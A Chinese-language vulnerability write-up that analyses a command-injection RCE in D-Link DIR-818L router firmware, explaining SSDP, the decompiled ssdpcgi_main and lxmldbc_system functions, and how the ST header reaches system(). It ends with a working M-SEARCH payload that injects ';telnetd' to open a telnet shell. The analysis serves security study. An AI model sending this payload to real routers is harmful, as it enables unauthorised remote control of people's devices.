某IOT设备漏洞分析
申明:本文章所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本文及作者无关,请谨记守法.
设备名称: DLINK DIR-818l
固件包: d-link DIR818L_FW105b01 A1
环境搭建: 使用firmAE
./run.sh -r mk818l ./firematr/ DIR818L_FW105b01
目录
RCE漏洞
一、前置知识
二、漏洞分析
三、需要了解的几个重要函数
四、代码审计
RCE漏洞
一、前置知识
SSDP协议(Simple Service Discovery Protocol)
SSDP就是简单服务发现协议(SimpleServiceDiscoveryProtocol)是一种应用层协议,它是构成通用即插即用(也就是UPnP,UPnP是各种各样的智能设备、无线设备和个人电脑等实现遍布全球的对等网络连接的结构)技术的核心协议之一。用于发现局域网里面的设备和服务,SSDP消息分为设备查询消息、设备通知消息两种,通常情况下,使用更多地是设备查询消息。一般在嵌入式设备中如路由器,摄像头中较为常见。 简单服务发现协议提供了在局部网络里面发现设备的机制。控制点(也就是接受服务的客户端)能够直接通过使用简单服务发现协议,根据自己的需要查询在自己所在的局部网络里面提供特定服务的设备。设备(也就是提供服务的服务器端)也能够直接通过使用简单服务发现协议,向自己所在的局部网络里面的控制点宣告它的存在。
请求头消息格式
M-SEARCH * HTTP/1.1
HOST: 239.255.255.250:1900
MAN: "ssdp:discover"
MX: 5
ST: ssdp:all
1 消息头为固定格式
2 HOST地址 ip:port
3 MAN后面的ssdp:discover为固定格式
4 MX为最长等待时间
5 ST 查询目标,它的值可以是: upnp:rootdevice 仅搜索网络中的根设备 uuid:device-UUID 查询UUID标识的设备 urn:schemas-upnp-org:device:device-Type:version 查询device-Type字段指定的设备类型,设备类型和版本由UPNP组织定义,其中,第三种一般可以用来自定义设备,如:ST: urn:schemas-upnp-org:device:Server:1
响应包
HTTP/1.1 200 OK
CACHE-CONTROL: max-age = seconds until advertisement expires
DATE: when reponse was generated
EXT:
LOCATION: URL for UPnP description for root device
SERVER: OS/Version UPNP/1.0 product/version
ST: search target
USN: advertisement UUID
和HTTP协议极为相似,为后续的知识做基础
二、漏洞分析
此次触发RCE的漏洞函数为 ssdpcgi_main()
提权固件后进行逆向分析,其反汇编代码如下:
ssdpcgi_main()
int __fastcall ssdpcgi_main(int a1)
{int result; // $v0char *v2; // $s0char *v3; // $s3char *v4; // $v0char *v5; // $s2const char *v6; // $s1bool v7; // dcchar *v8; // $a2const char *v9; // $a0result = -1;if ( a1 == 2 ){v2 = getenv("HTTP_ST");v3 = getenv("REMOTE_ADDR");v5 = getenv("REMOTE_PORT");v4 = getenv("SERVER_ID");v6 = v4;if ( v2 && v3 && v5 ){v7 = v4 == 0;result = -1;if ( !v7 ){v7 = strchr(v2, '`') != 0;result = -1;if ( !v7 ){v7 = strchr(v3, '`') != 0;result = -1;if ( !v7 ){v7 = strchr(v5, '`') != 0;result = -1;if ( !v7 ){v7 = strchr(v6, '`') != 0;result = -1;if ( !v7 ){if ( !strncmp(v2, "ssdp:all", 8u) ){v8 = v3;v9 = "%s ssdpall %s:%s %s &";
LABEL_14:lxmldbc_system(v9, "/etc/scripts/upnp/M-SEARCH.sh", v8, v5, v6);// // ERROR_FUNreturn 0;}if ( !strncmp(v2, "upnp:rootdevice", 15u) ){v8 = v3;v9 = "%s rootdevice %s:%s %s &";goto LABEL_14;}if ( !strncmp(v2, "uuid:", 5u) ){lxmldbc_system("%s uuid %s:%s %s %s &", "/etc/scripts/upnp/M-SEARCH.sh", v3, v5, v6, v2);return 0;}v7 = strncmp(v2, "urn:", 4u) != 0;result = 0;if ( v7 )return result;if ( strstr(v2, ":device:") ) // 漏洞利用点{lxmldbc_system("%s devices %s:%s %s %s &", "/etc/scripts/upnp/M-SEARCH.sh", v3, v5, v6, v2);return 0;}if ( strstr(v2, ":service:") ){lxmldbc_system("%s services %s:%s %s %s &", "/etc/scripts/upnp/M-SEARCH.sh", v3, v5, v6, v2);return 0;}result = 0;}}}}}}else{result = -1;}}return result;
}lxmldbc_system()
int lxmldbc_system(const char *a1, ...)
{char v2[1028]; // [sp+1Ch] [-404h] BYREFva_list va; // [sp+42Ch] [+Ch] BYREFva_start(va, a1);vsnprintf(v2, 1024u, a1, va);return system(v2);
}先分析lxmldbc_system()这个函数,因为这个函数才是触发代码执行的函数
这个函数中有俩个比较重要的函数一个是vsnprintf(),system()
system执行命令的函数 传入的参数为 v2回溯到最前面是发现HTTP_ST中的内容也就是SSDP协议中ST字段中的内容,那么是不是可以将ST:字段中的内容插入一些特殊命令,传递进这个函数中就可以达到执行命令的作用,先不考虑有什么过滤,用什么办法才能将参数完整传进来,以及怎么写payload
三、需要了解的几个重要函数
vsnprintf()
int vsnprintf (char * sbuf, size_t n, const char * format, va_list arg );
参数sbuf:用于缓存格式化字符串结果的字符数组
参数n:限定最多打印到缓冲区sbuf的字符的个数为n-1个,因为vsnprintf还要在结果的末尾追加\0。如果格式化字符串长度大于n-1,则多出的部分被丢弃。如果格式化字符串长度小于等于n-1,则可以格式化的字符串完整打印到缓冲区sbuf。一般这里传递的值就是sbuf缓冲区的长度。
参数format:格式化限定字符串
参数arg:可变长度参数列表
作用:使用vsnprintf()用于向一个字符串缓冲区打印格式化字符串,且可以限定打印的格式化字符串的最大长度。
说白了就是将sbuf数组中的字符串打印出来,那么如果这个sbuf数组中是一些危险的命令,是不是就可以将命令传入system函数中执行从而执行命令。
#include <stdio.h>
#include <string.h>
#include <stdarg.h>#define SBUF_SIZE 128
char sbuf[SBUF_SIZE];void MyPrintF( const char * format, ... )
{va_list args;va_start (args, format);vsnprintf (sbuf,SBUF_SIZE,format, args);va_end (args);printf("%s",sbuf);
}int main()
{ MyPrintF("my name is %s,my age is %d\n","bob",18);return 0;
}system()函数
这个函数很简单执行命令,但是传统使用这个函数的时候通常一般会这么用
system("id")
这样会返回一个id值 是执行命令以后的id值
但是system()还有一种执行命令的方法就是在函数中可以加;号,如:system("id;id;id;id;id")
这样是可以直接执行5个id命令,也就是返回5个id值
也就是后面ST:为什么要这样构造payload
strchr()
在字符串中寻找字符C第一次出现的位置,并返回其位置(地址指针),若失败则返回NULL;
#include<string.h>
#include<stdio.h>
int main()
{char *str="Hello,I am sky2098,I liking programing!";char character='k' ; //指定一个字符char *strtemp;strtemp=strchr(str,character);if(strtemp!=NULL){printf("%s ",strtemp);}else{printf("can not find %c !",strtemp);}return 0;
}strncmp(s1,s2,n)
用来比较s1和s2字符串的前n个字符。如果两个字符串相等的话,strncmp将返回0。如果s1是s2的一个子串的话,s1小于s2。
strstr(haystack,needle)
该函数返回在 haystack 中第一次出现 needle 字符串的位置,如果未找到则返回 null
#include <stdio.h>
#include <string.h>int main()
{const char haystack[20] = "RUNOOB";const char needle[10] = "NOOB";char *ret;ret = strstr(haystack, needle);printf("子字符串是: %s\n", ret);return(0);
}四、代码审计
然后开始分析 ssdpcgi_main()这个函数,原始if中的代码用xxxx()函数表示,比较好看一些,lxmldbc_system()也在xxxx()函数中。首先得让a1=2才可以执行if中的内容,具体a1是什么内容后面再继续分析。
第一个IF语句
if ( a1 == 2 ){xxxx()}return result;第二个IF语句 判断v2,v3,v5 参数完不完整,不完整直接退出
if ( v2 && v3 && v5 ) {v7 = v4 == 0;result = -1;xxxx1()
}
else{result = -1;
}第三个IF语句
判断v7是不是为空值 也就是之前v4的服务号,判断有没有服务开启
if ( !v7 ){v7 = strchr(v2, '`') != 0;result = -1;if ( !v7 ){v7 = strchr(v3, '`') != 0;result = -1;if ( !v7 ){v7 = strchr(v5, '`') != 0;result = -1;if ( !v7 ){v7 = strchr(v6, '`') != 0;result = -1;if ( !v7 ){if ( !strncmp(v2, "ssdp:all", 8u) ){v8 = v3;v9 = "%s ssdpall %s:%s %s &";
LABEL_14:lxmldbc_system(v9, "/etc/scripts/upnp/M-SEARCH.sh", v8, v5, v6);// // ERROR_FUNreturn 0;}if ( !strncmp(v2, "upnp:rootdevice", 15u) ){v8 = v3;v9 = "%s rootdevice %s:%s %s &";goto LABEL_14;}if ( !strncmp(v2, "uuid:", 5u) ){lxmldbc_system("%s uuid %s:%s %s %s &", "/etc/scripts/upnp/M-SEARCH.sh", v3, v5, v6, v2);return 0;}v7 = strncmp(v2, "urn:", 4u) != 0;result = 0;if ( v7 )return result;if ( strstr(v2, ":device:") ) // 漏洞利用点{lxmldbc_system("%s devices %s:%s %s %s &", "/etc/scripts/upnp/M-SEARCH.sh", v3, v5, v6, v2);return 0;}if ( strstr(v2, ":service:") ){lxmldbc_system("%s services %s:%s %s %s &", "/etc/scripts/upnp/M-SEARCH.sh", v3, v5, v6, v2);return 0;}result = 0;}}}}}第 四 五 六个IF语句
主要是针对v2, v3,v5,v6 进行判断看传入的参数中有无 ` 号 防止一些命令进行执行。
if ( !v7 ){v7 = strchr(v3, '`') != 0;result = -1;if ( !v7 ){v7 = strchr(v5, '`') != 0;result = -1;if ( !v7 ){v7 = strchr(v6, '`') != 0;result = -1;继续更进
通过继续分析得知如果需要执行命令得保证lxmldbc_system()函数中有V2变量
if ( !strncmp(v2, "ssdp:all", 8u) ){v8 = v3;v9 = "%s ssdpall %s:%s %s &";
LABEL_14:lxmldbc_system(v9, "/etc/scripts/upnp/M-SEARCH.sh", v8, v5, v6);// // ERROR_FUNreturn 0;
}if ( !strncmp(v2, "upnp:rootdevice", 15u) ){v8 = v3;v9 = "%s rootdevice %s:%s %s &";
goto LABEL_14;}if ( !strncmp(v2, "uuid:", 5u) ) {lxmldbc_system("%s uuid %s:%s %s %s &", "/etc/scripts/upnp/M-SEARCH.sh", v3, v5, v6, v2);
return 0;}v7 = strncmp(v2, "urn:", 4u) != 0;
result = 0;if ( v7 )
return result;if ( strstr(v2, ":device:") ) // 漏洞利用点 {lxmldbc_system("%s devices %s:%s %s %s &", "/etc/scripts/upnp/M-SEARCH.sh", v3, v5, v6, v2);
return 0;
}if ( strstr(v2, ":service:") ){lxmldbc_system("%s services %s:%s %s %s &", "/etc/scripts/upnp/M-SEARCH.sh", v3, v5, v6, v2);
return 0;}通过以上筛选得出最可能存在利用点的地方
if ( strstr(v2, ":device:") ){ // 漏洞利用点lxmldbc_system("%s devices %s:%s %s %s &", "/etc/scripts/upnp/M-SEARCH.sh", v3, v5, v6, v2);return 0;}if ( strstr(v2, ":service:") ) {lxmldbc_system("%s services %s:%s %s %s &", "/etc/scripts/upnp/M-SEARCH.sh", v3, v5, v6, v2);
return 0;}总结以上内容构造payload为
M-SEARCH * HTTP/1.1
HOST:ip:prot
ST:urn:device:1;telnetd // telnetd 为执行的命令 可以换其他的比如touch 1.txt 生成1.txt文本
MX:2
MAN:"ssdp:discover"
通过测试发现一开始的a1的值及MX:字段的内容为2
参考文章链接:
IOTsec-Zone物联网安全社区
SSDP协议_慕容野野的博客-CSDN博客_ssdp协议
某IOT设备漏洞分析相关推荐
- IoT 设备通信安全讨论
IoT 设备通信安全讨论 作者:360CERT 0x00 序言 IoT 设备日益增多的今天,以及智能家居这一话题愈发火热,智能家居市场正在飞速的壮大和发展,无数 IoT 设备正在从影片中不断的走向用户 ...
- 漏洞分析与检测技术在物联网安全中的应用
这里写自定义目录标题 一.引言 二.相关理论 1.物联网系统安全挑战 1.1 网络层安全挑战 1.2 硬件感知层安全挑战 1.3 中间件层安全挑战 1.4 应用功能层安全挑战 2.漏洞挖掘技术 三.漏 ...
- IoT设备如何“守门”?厂商拖慢修复节奏,设备出厂设置弱密码
最近,刚搞出一款蹲坑神器APP的360感受到了群众的召唤,其中产品核心DIY智能硬件组合更是好评如潮.于是闲着没事干的他们用自家"大脑"搞了个调研,主要针对 IoT 智能硬件用户是 ...
- 无人机、IoT 设备都有漏洞?专访以色列老牌安全企业Check Point | 拟合
从无序中寻找踪迹,从眼前事探索未来. 2021 年正值黄金十年新开端,CSDN 以中立技术社区专业.客观的角度,深度探讨中国前沿 IT 技术演进,推出年度重磅企划栏目--「拟合」,通过对话企业技术高管 ...
- 2022CTF培训(十一)IOT 相关 CVE 漏洞分析
附件下载链接 D-Link DIR-823G 固件全系统仿真 2022CTF培训(十)IOT 相关 CVE 漏洞分析 是采用 qemu-user 对个别程序进行仿真,而对于完整的仿真需要使用 qemu ...
- BMC固件漏洞导致OT和IoT设备易受远程攻击
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 工业网络安全公司 Nozomi Networks 的研究人员在基板管理控制器 (BMC) 固件中发现了十几个漏洞. BMC 是一款专门的处理器, ...
- 中国台湾芯片设计商 Realtek 的WiFi SDK漏洞影响数百万IOT设备
中国台湾芯片厂商Realtek 发布安全公告称在其软件开发套件和WiFi模块中发现了4个安全漏洞,影响超过65个厂商的200款IoT设备. 这4个漏洞分别是: ◼CVE-2021-35392:由于SS ...
- 研究员告警:严重漏洞影响数千万台IoT设备,可远程查看实时音视频并接管设备...
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 安全研究员警告称,通过 ThroughTek 公司 Kalay 物联网云平台连接的数千万台设备受一个严重漏洞(CVE-2021-28372)影响 ...
- Ripple 20:严重漏洞影响全球数十亿IoT设备,复杂软件供应链使修复难上加难
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 周三,以色列网络安全公司 JSOF 警告称,在20世纪90年代设计的一个小型库 Treck TCP/IP 中发现了19个漏洞,可导致全 ...
最新文章
- [问题解决] Python中 == 与 is 的区别
- 宏基因组实战9. 组装assembly和分箱bin结果可视化—Anvi'o
- 找到合适的方案记录服务端日志
- 笔记-高项案例题-2016年上-范围管理+沟通管理+进度管理+风险管理
- 遇到的Ajax相关问题
- 依赖注入_set方法注入_构造器注入
- 《BI项目笔记》数据源视图设置
- admin——django自带数据库管理工具
- Java虚拟机 —— 内存和线程
- bzoj 1227 [SDOI2009]虔诚的墓主人
- Flink 数据类型
- Socket与拔掉网线
- ThinkPHP5集成JS-SDK实现微信自定义分享功能
- C# WPF 高级教程
- Error launching Console Application PDFLaTeX
- 理解和应用共线平面束
- 如何用深度学习对几种类型的图片进行分类(tensorflow,CNN)
- 城镇化率与世界平均水平相当 质量不高问题突出
- Android(一)
- 十大家用智能监控摄像头品牌排名